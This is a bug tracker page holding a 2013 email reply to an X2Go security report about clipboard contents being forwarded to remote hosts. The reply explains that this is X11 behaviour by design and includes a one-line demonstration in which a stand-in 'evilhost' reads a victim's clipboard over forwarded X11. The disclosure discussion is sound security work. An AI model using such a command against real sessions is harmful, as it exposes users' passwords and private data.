X2Go Bug report logs - #509
Document NX/X11 security issue: clipboard sniffing

Package: wiki.x2go.org; Maintainer for wiki.x2go.org is x2go-dev@lists.x2go.org;

Reported by: Christoph Anton Mitterer <calestyo@scientia.net>

Date: Mon, 1 Jul 2013 02:48:02 UTC

Severity: grave

Tags: security

Full log


🔗 View this message in rfc822 format

X-Loop: owner@bugs.x2go.org
Subject: Bug#258: [X2Go-Dev] Bug#258: SECURITY: x2goclient allows clipboard sniffing
Reply-To: Alexander Wuerstlein <snalwuer@cip.informatik.uni-erlangen.de>, 258@bugs.x2go.org
Resent-From: Alexander Wuerstlein <snalwuer@cip.informatik.uni-erlangen.de>
Resent-To: x2go-dev@lists.berlios.de
Resent-CC: X2Go Developers <x2go-dev@lists.berlios.de>
X-Loop: owner@bugs.x2go.org
Resent-Date: Mon, 01 Jul 2013 12:03:02 +0000
Resent-Message-ID: <handler.258.B258.137267939828332@bugs.x2go.org>
Resent-Sender: owner@bugs.x2go.org
X-X2Go-PR-Message: followup 258
X-X2Go-PR-Package: x2goclient
X-X2Go-PR-Keywords: security
Received: via spool by 258-submit@bugs.x2go.org id=B258.137267939828332
          (code B ref 258); Mon, 01 Jul 2013 12:03:02 +0000
Received: (at 258) by bugs.x2go.org; 1 Jul 2013 11:49:58 +0000
X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on
	ymir.das-netzwerkteam.de
X-Spam-Level: 
X-Spam-Status: No, score=0.0 required=5.0 tests=URIBL_BLOCKED autolearn=ham
	version=3.3.2
X-Greylist: delayed 361 seconds by postgrey-1.34 at ymir; Mon, 01 Jul 2013 13:49:57 CEST
Received: from faui03.informatik.uni-erlangen.de (faui03.informatik.uni-erlangen.de [131.188.30.103])
	by ymir (Postfix) with ESMTPS id AD2895DA79
	for <258@bugs.x2go.org>; Mon,  1 Jul 2013 13:49:57 +0200 (CEST)
Received: from faui0sr0.informatik.uni-erlangen.de (faui0sr0.informatik.uni-erlangen.de [131.188.30.90])
	by faui03.informatik.uni-erlangen.de (Postfix) with ESMTP id 739AC6808EE;
	Mon,  1 Jul 2013 13:43:56 +0200 (CEST)
Received: by faui0sr0.informatik.uni-erlangen.de (Postfix, from userid 31763)
	id 6D466B604D8; Mon,  1 Jul 2013 13:43:56 +0200 (CEST)
Date: Mon, 1 Jul 2013 13:43:56 +0200
From: Alexander Wuerstlein <snalwuer@cip.informatik.uni-erlangen.de>
To: Christoph Anton Mitterer <calestyo@scientia.net>, 258@bugs.x2go.org
Message-ID: <20130701114356.GP2447@cip.informatik.uni-erlangen.de>
References: <1372646308.18508.2.camel@heisenberg.scientia.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <1372646308.18508.2.camel@heisenberg.scientia.net>
X-Echelon-Scan: plutonium bomb osama revenge dirty allah satan iran victory
 dimona cocaine guantanamo centrifuge holy war pigs mossad nsa
X-Echelon-Result: Belligerent
User-Agent: Mutt/1.5.21 (2010-09-15)
On 13-07-01 04:56, Christoph Anton Mitterer <calestyo@scientia.net> wrote:
> Package: x2goclient
> Severity: grave
> Tags: security
> 
> Hi.
> 
> From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588
> 
> 
> It seems that per default (and I even found no way to disable it)
> x2goclient (and perhaps other related tools?) transmit the content of
> the clipboard to the remote host.

Yes, other related tools like X11. x2go is basically just a faster
version of the traditional xforwarding. In X11 every client can always
access the clipboard/selection/etc., so you will also have the same
security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"'
demonstrates this.

> As this may easily contain passwords or other sensitive information,
> this is a extremely critical hole.

I disagree, this is not a hole at all, it works as intended. Its just
that users are often not educated about the implications of passing
around passwords via the clipboard etc.

But I concur that the ability to switch off clipboard/selection/...
forwarding in the x2goagent/x2goclient would be nice to have. Patches
are of course always welcome.



Ciao,

Alexander Wuerstlein.

Send a report that this bug log contains spam.


X2Go Developers <owner@bugs.x2go.org>. Last modified: Thu Nov 21 14:56:20 2024; Machine Name: ymir.das-netzwerkteam.de

X2Go Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.